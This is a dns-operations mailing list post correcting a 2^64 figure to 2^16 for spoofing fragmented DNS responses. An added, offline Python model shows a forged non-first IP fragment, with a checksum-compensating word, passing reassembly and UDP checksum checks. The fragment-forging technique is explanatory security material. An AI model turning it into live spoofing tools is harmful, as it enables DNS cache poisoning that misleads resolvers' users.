[dns-operations] .fr has 5 DNSKEYs

George Barwood george.barwood at blueyonder.co.uk
Wed Jun 1 20:55:47 UTC 2011


I wrote:

> Fragmented UDP responses are especially vulnerable to spoofing, because
> of the way IP fragmentation works. The DNS ID field (and UDP source port)
> is only present in the first fragment, so by sending spoofed non-first fragments
> an attacker that can predict the IP ID (which might be possible depending
> on the underlying IP implementation) may be able to spoof a response with
> a single or very low number of packets, or in any case using ~2^64 packets.

Sorry, that should be 2^16 packets of course. Senility setting in, I'm afraid;
I have no idea how I managed to write that.


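Added example, not part of George Barwood's post or the dns-operations thread: a pure-Python model of the problem described above. It builds an oversize DNS response (five synthetic DNSKEY records for fr., mimicking the thread's subject), fragments it at the IP layer, and shows that a non-first fragment is tied to its datagram by nothing more than source/destination address, protocol and the 16-bit IP ID, so a spoofer who knows or guesses that ID can replace the tail of the answer without ever seeing the UDP source port or DNS transaction ID. The checksum fix-up in forge_tail (a trailing 16-bit word that keeps the one's-complement sum of the datagram unchanged, so the UDP checksum in fragment 0 still verifies) is my addition, not something the post discusses. Addresses, ports, the IP ID, the transaction ID and the key bytes are all constructed, and nothing touches the network.

```python
"""Model of spoofing a non-first IP fragment of a large UDP DNS response (added example)."""
import socket
import struct

MTU = 1500                # assumed path MTU
IP_HDR_LEN = 20
IP_ID_SPACE = 1 << 16     # the only unknown a non-first-fragment spoofer has to guess
UDP = 17
# constructed endpoints: authoritative server -> resolver (documentation addresses)
SRC, DST, SPORT, DPORT = "192.0.2.53", "198.51.100.7", 53, 40123


def ones_complement_sum(data):
    """16-bit one's-complement sum with end-around carry (the IP/UDP checksum primitive)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data):
    return (~ones_complement_sum(data)) & 0xFFFF


def ipv4_header(src, dst, ident, more_fragments, offset_units, payload_len):
    """IPv4 header for one fragment; offset_units is the fragment offset in 8-byte units."""
    flags_frag = (more_fragments << 13) | offset_units
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, IP_HDR_LEN + payload_len, ident, flags_frag,
                      64, UDP, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def parse_fragment(pkt):
    f = struct.unpack("!BBHHHBBH4s4s", pkt[:IP_HDR_LEN])
    return {"src": socket.inet_ntoa(f[8]), "dst": socket.inet_ntoa(f[9]), "proto": f[6],
            "ident": f[3], "mf": bool(f[4] & 0x2000), "offset": (f[4] & 0x1FFF) * 8,
            "data": pkt[IP_HDR_LEN:]}


def match_key(pkt):
    """All a receiver uses to tie a non-first fragment to its datagram: no ports, no DNS ID."""
    p = parse_fragment(pkt)
    return (p["src"], p["dst"], p["proto"], p["ident"])


def pseudo_header(src, dst, length):
    return socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, UDP, length)


def udp_datagram(src, dst, sport, dport, payload):
    """UDP header + payload; the checksum covers the pseudo-header and the whole payload."""
    hdr = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    csum = checksum(pseudo_header(src, dst, 8 + len(payload)) + hdr + payload) or 0xFFFF
    return hdr[:6] + struct.pack("!H", csum) + payload


def udp_checksum_ok(src, dst, udp):
    return ones_complement_sum(pseudo_header(src, dst, len(udp)) + udp) == 0xFFFF


def dns_response(txid, keys):
    """Constructed answer to 'fr. IN DNSKEY': header, question, one DNSKEY RR per (flags, key)."""
    msg = struct.pack("!HHHHHH", txid, 0x8180, 1, len(keys), 0, 0)
    msg += b"\x02fr\x00" + struct.pack("!HH", 48, 1)
    for flags, key in keys:
        rdata = struct.pack("!HBB", flags, 3, 8) + key       # flags, protocol 3, algorithm 8
        msg += b"\xc0\x0c" + struct.pack("!HHIH", 48, 1, 3600, len(rdata)) + rdata
    return msg


def fragment(src, dst, ident, udp, mtu=MTU):
    """Split one UDP datagram into IPv4 fragments; non-last chunks are multiples of 8 bytes."""
    chunk = (mtu - IP_HDR_LEN) // 8 * 8
    frags = []
    for off in range(0, len(udp), chunk):
        part = udp[off:off + chunk]
        frags.append(ipv4_header(src, dst, ident, 1 if off + chunk < len(udp) else 0,
                                 off // 8, len(part)) + part)
    return frags


def reassemble(frags):
    """Receiver: accept fragments sharing one (src, dst, proto, IP ID), join them by offset."""
    if len({match_key(f) for f in frags}) != 1:
        raise ValueError("fragments do not belong to one datagram")
    out = b""
    for p in sorted((parse_fragment(f) for f in frags), key=lambda p: p["offset"]):
        if p["offset"] != len(out):
            raise ValueError("gap or overlap at offset %d" % p["offset"])
        out += p["data"]
    return out


def forge_tail(src, dst, ident, legit_frags, forged_rdata, fix_checksum=True):
    """Spoofer's replacement for the last (non-first) fragment: same 4-tuple and offset, forged
    bytes, then one 16-bit word chosen so the datagram's one's-complement sum is unchanged."""
    last = parse_fragment(legit_frags[-1])
    n = len(last["data"])
    pos = (n - 2) & ~1                                # even offset for the compensation word
    body = forged_rdata[:pos].ljust(pos, b"\x00")
    comp = (ones_complement_sum(last["data"]) - ones_complement_sum(body)) % 0xFFFF
    tail = body + struct.pack("!H", comp if fix_checksum else 0) + b"\x00" * (n - pos - 2)
    return ipv4_header(src, dst, ident, 0, last["offset"] // 8, len(tail)) + tail


def demo(ident=0x4242):
    keys = [(257 if i < 2 else 256, bytes([i + 1]) * 300) for i in range(5)]  # 5 fake DNSKEYs
    udp = udp_datagram(SRC, DST, SPORT, DPORT, dns_response(0x1A2B, keys))
    frags = fragment(SRC, DST, ident, udp)
    head = parse_fragment(frags[0])["data"]           # UDP header + start of the DNS message
    forged = forge_tail(SRC, DST, ident, frags, b"\x13" * 400)
    naive = forge_tail(SRC, DST, ident, frags, b"\x13" * 400, fix_checksum=False)
    mixed = reassemble([frags[0], forged])            # legit fragment 0 + spoofed tail
    return {
        "fragments": len(frags),
        "first_fragment_ports_and_txid": struct.unpack("!HH", head[:4]) + struct.unpack("!H", head[8:10]),
        "nonfirst_key_matches": match_key(frags[1]) == match_key(forged),
        "legit_ok": udp_checksum_ok(SRC, DST, reassemble(frags)),
        "forged_ok": udp_checksum_ok(SRC, DST, mixed),
        "naive_ok": udp_checksum_ok(SRC, DST, reassemble([frags[0], naive])),
        "payload_changed": mixed != udp,
        "txid_unchanged": mixed[8:10] == udp[8:10],
        "ip_id_space": IP_ID_SPACE,
    }
```

Running demo() shows the two halves of the argument: fragment 0 carries the UDP ports and the DNS ID, while the receiver accepts the second fragment on the strength of (src, dst, proto, IP ID) alone, so the spoofed tail is stitched onto the genuine header and the genuine transaction ID. The naive forgery fails the UDP checksum, the compensated one passes, and IP_ID_SPACE is the 2^16 of the correction: with a predictable ID the spoofer needs one packet, and with an unpredictable one at most 65536.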